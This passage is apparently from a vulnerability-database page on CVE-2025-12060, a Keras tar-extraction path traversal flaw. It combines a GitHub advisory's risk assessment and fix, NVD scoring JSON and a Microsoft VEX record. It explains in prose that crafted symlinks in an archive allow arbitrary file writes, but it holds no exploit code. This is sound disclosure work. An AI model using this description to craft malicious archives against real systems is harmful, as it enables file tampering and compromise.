written to system directories\n\n**Affected Environments:**\n- Research environments downloading public datasets\n- Production ML systems with automated dataset fetching\n- Educational platforms using Keras for tutorials\n- CI/CD pipelines training models with external data\n\n### Risk Assessment\n\n**High Risk Factors:**\n- Common usage pattern in ML workflows\n- No user awareness of extraction security\n- Silent failure mode (no warnings)\n- Cross-platform vulnerability\n\n**Potential Consequences:**\n- Arbitrary file write on target system\n- Configuration file tampering\n- Code injection via overwritten scripts\n- Data exfiltration through planted files\n- System compromise in containerized environments\n\n## Recommended Fix\n\n### Immediate Mitigation\n\nReplace the vulnerable extraction code with:\n\n```python\n# Secure implementation\nif zipfile.is_zipfile(file_path):\n # Zip archive - implement similar filtering\n archive.extractall(path, members=filter_safe_paths(archive))\nelse:\n # Tar archive with proper security filter\n archive.extractall(path, members=filter_safe_paths(archive), filter=\"data\")\n```\n\n### Long-term Solution\n\n1. **Add `filter=\"data\"` parameter** to all `tarfile.extractall()` calls\n2. **Implement comprehensive path validation** before extraction\n3. **Add extraction logging** for security monitoring\n4. **Consider sandboxed extraction** for untrusted archives\n5. **Update documentation** to warn about archive security risks\n\n### Backward Compatibility\n\nThe fix maintains full backward compatibility as `filter=\"data\"` is the recommended secure default for Python 3.12+.\n\n## References\n\n- [[Python tarfile security documentation](https://docs.python.org/3/library/tarfile.html#extraction-filters)](https://docs.python.org/3/library/tarfile.html#extraction-filters)\n- [[CVE-2007-4559](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4559)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4559) - Related tarfile vulnerability\n- [[OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)](https://owasp.org/www-community/attacks/Path_Traversal)\n\nNote: Reported in Huntr as well, but didn\u0027t get response\nhttps://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4",
"id": "GHSA-hjqc-jx6g-rwp9",
"modified": "2025-12-02T00:58:33Z",
"published": "2025-12-02T00:58:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12638"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Keras Directory Traversal Vulnerability"
}
FKIE_CVE-2025-12060
Vulnerability from fkie_nvd - Published: 2025-10-30 17:15 - Updated: 2025-11-04 15:41| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\"data\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517.\u00a0Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12)."
}
],
"id": "CVE-2025-12060",
"lastModified": "2025-11-04T15:41:56.843",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cve-coordination@google.com",
"type": "Secondary"
}
]
},
"published": "2025-10-30T17:15:37.520",
"references": [
{
"source": "cve-coordination@google.com",
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"source": "cve-coordination@google.com",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
}
],
"sourceIdentifier": "cve-coordination@google.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "cve-coordination@google.com",
"type": "Secondary"
}
]
}
MSRC_CVE-2025-12060
Vulnerability from csaf_microsoft - Published: 2025-10-02 00:00 - Updated: 2025-11-01 01:01Notes
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-12060 Keras keras.utils.get_file Utility Path Traversal Vulnerability - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-12060.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "Keras keras.utils.get_file Utility Path Traversal Vulnerability",
"tracking": {
"current_release_date": "2025-11-01T01:01:19.000Z",
"generator": {
"date": "2025-11-04T20:08:19.279Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-12060",
"initial_release_date": "2025-10-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-11-01T01:01:19.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 keras 3.3.3-4",
"product": {
"name": "\u003cazl3 keras 3.3.3-4",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 keras 3.3.3-4",
"product": {
"name": "azl3 keras 3.3.3-4",
"product_id": "20558"
}
}
],
"category": "product_name",
"name": "keras"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 keras 3.3.3-4 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 keras 3.3.3-4 as a component of Azure Linux 3.0",
"product_id": "20558-17084"
},
"product_reference": "20558",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-12060",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0026#39;Path Traversal\u0026#39;)"
},
"notes": [
{
"category": "general",
"text": "Google",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20558-17084"
],
"known_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-12060 Keras keras.utils.get_file Utility Path Traversal Vulnerability - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-12060.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2025-11-01T01:01:19.000Z",
"details": "3.3.3-5:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"title": "Keras keras.utils.get_file Utility Path Traversal Vulnerability"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.